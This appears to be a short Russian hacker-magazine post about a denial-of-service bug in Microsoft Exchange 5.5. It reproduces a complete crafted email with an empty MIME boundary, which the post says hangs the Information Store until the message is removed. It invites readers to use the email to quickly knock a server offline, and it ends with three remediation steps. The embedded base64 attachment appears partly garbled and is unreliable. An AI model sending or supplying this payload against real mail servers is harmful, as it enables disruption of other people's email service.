Хакер #305. Многошаговые SQL-инъекции
Что бы по быстренькому организовать DoS атаку сервер с Microsoft Exchange 5.5, надо всего лишь послать определенный емайл 🙂 Сервак не поднимется, пока не удалить этот емайл.
Дырка обнаружена в Microsoft Exchange 5.5
Microsoft Information Store (STORE.EXE) вешается от того, что граница аттачмента письма установлена как "" (пустота 🙂
Exploit:
Можешь использовать это сообщение, а можешь его отредактировать, главное, чтобы его границы были установлены как "" (boundary = "")
Date: Mon, 21 sep 2020 22:27:24
From: Anyone
To: someone
Subject: Test
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary = ""
This is a multi-part message in MIME format.
--
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
--
Content-Type: application/octet-stream;
name=about.html
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename=about.html
PEh0bWw+DQo8SGVhZD4NCjxUaXRsZT4NCmFib3V0DQo8L1RpdGxlPg0KPC9IZWFkPg0KPE
Qkdjb2xvcj0iI2ZmZmZmZiI+DQoNCjwhLS0gVGhlIHRhYmxlIGlzIG5vdCBmb3JtYXR0ZWQgbmlj
ZWx5IGJlY2F1c2Ugc29tZSBicm93c2VycyBjYW5ub3Qgam9pbiBpbWFnZXMgaW4gdGFibGUgs
bHMgaWYgdGhlcmUgYXJlIGFueSBoYXJkIGNhcnJpYWdlIHJldHVybnMgaW4gYSBURC4gLS0oN
CjxUYWJsZSBCb3JkZXI9IjAiIENlbGxTcGFjaW5nPSIwIiBDZWxsUGFkZGluZz0iMCIgPg0KCTxU
cj4NCgkJPFRkIFdpZHRoPSIyMCIgSGVpZ2h0PSIyNSI+PC9UZD4NCgkJPFRkIFdpZHRoPSIzM
IEhlaWdodD0iMjUiPjwvVGQ+DQoJCTxUZCBXaWR0aD0iMjkiIEhlaWdodD0iMjUiPjwvVGQ+DQoJ
CTxUZCBXaWR0aD0iMzQ4IiBIZWlnaHQ9IjI1Ij48L1RkPg0KCTwvVHI+DQoJPFRyPg0KCQk8
V2lkdGg9IjIwIiBIZWlnaHQ9IjE0Ij48L1RkPg0KCQk8VGQgV2lkdGg9IjMyNiIgSGVpZ2h0PSIx
NCI+PC9UZD4NCgkJPFRkIFdpZHRoPSIyOSIgSGVpZ2h0PSIxNCI+PC9UZD4NCgkJPFRkRo
PSIzNDgiIEhlaWdodD0iNDUyIiBSb3dTcGFuPSIzIj48SW1nIFNyYz0iaW1hZ2VzL2Fib3V0cGhh
c21hXzJfMC5qcGciIEJvcmRlcj0iMCIgSGVpZ2h0PSI0NTIiIFdpZHRoPSIzNDgiIE5hbWU9ImFi
b3V0IiBBbHQ9IlBoYXNtYSAyLjAiPjwvVGQ+DQoJPC9Ucj4NCgk8VHI+DQoJCTxUZCBXaWR
MjAiIEhlaWdodD0iNDE0Ij48L1RkPg0KCQk8VGQgV2lkdGg9IjMyNiIgSGVpZ2h0PSI0MTQiPjxJ
bWcgU3JjPSJpbWFnZXMvYWJvdXRsaWNlbmNlZF90b18uanBnIiBCb3JkZXI9IjAiIEhlaWdod
NDE0IiBXaWR0aD0iMzI2IiBOYW1lPSJhYm91dDEiIEFsdD0ibGljRW5jRWQgdG86Ij48L1RkPg
CQk8VGQgV2lkdGg9IjI5IiBIZWlnaHQ9IjQxNCI+PC9UZD4NCgk8L1RyPg0KCTxUcj4NCgkJPF
IFdpZHRoPSIyMCIgSGVpZ2h0PSIyNCI+PC9UZD4NCgkJPFRkIFdpZHRoPSIzMjYiIEhlaWdod
MjQiPjwvVGQ+DQoJCTxUZCBXaWR0aD0iMjkiIEhlaWdodD0iMjQiPjwvVGQ+DQoJPC9Ucj4N
VHI+DQoJCTxUZD48SW1nIFNyYz0iaW1hZ2VzL2lzX3NpbmdsZV9waXhlbF9naWYuZ2lmIiBB
IiIgV2lkdGg9IjIwIiBIZWlnaHQ9IjEiPjwvVGQ+DQoJCTxUZD48SW1nIFNyYz0iaW1hZ2VzL2lz
X3NpbmdsZV9waXhlbF9naWYuZ2lmIiBBbHQ9IiIgV2lkdGg9IjMyNiIgSGVpZ2h0PSIxIj48L1Rk
Pg0KCQk8VGQ+PEltZyBTcmM9ImltYWdlcy9pc19zaW5nbGVfcGl4ZWxfZ2lmLmdpZiIgQWx
IFdpZHRoPSIyOSIgSGVpZ2h0PSIxIj48L1RkPg0KCQk8VGQ+PEltZyBTcmM9ImltYWdlcy9p
aW5nbGVfcGl4ZWxfZ2lmLmdpZiIgQWx0PSIiIFdpZHRoPSIzNDgiIEhlaWdodD0iMSI+PC9U
Cgk8L1RyPg0KPC9UYWJsZT4NCg0KDQo8IS0tQWRvYmUoUikgSW1hZ2VTdHlsZXIoVE0
RE8gTk9UIEVESVQNCmVuZCBEYXRhTWFwIC0tPg0KPC9Cb2R5Pg0KPC9IdG1sPg0KAAAA
Решение:
1) Вырубить все Exchange Services
2) Удалить email из директории IMCDATA.
3) Restart exchange.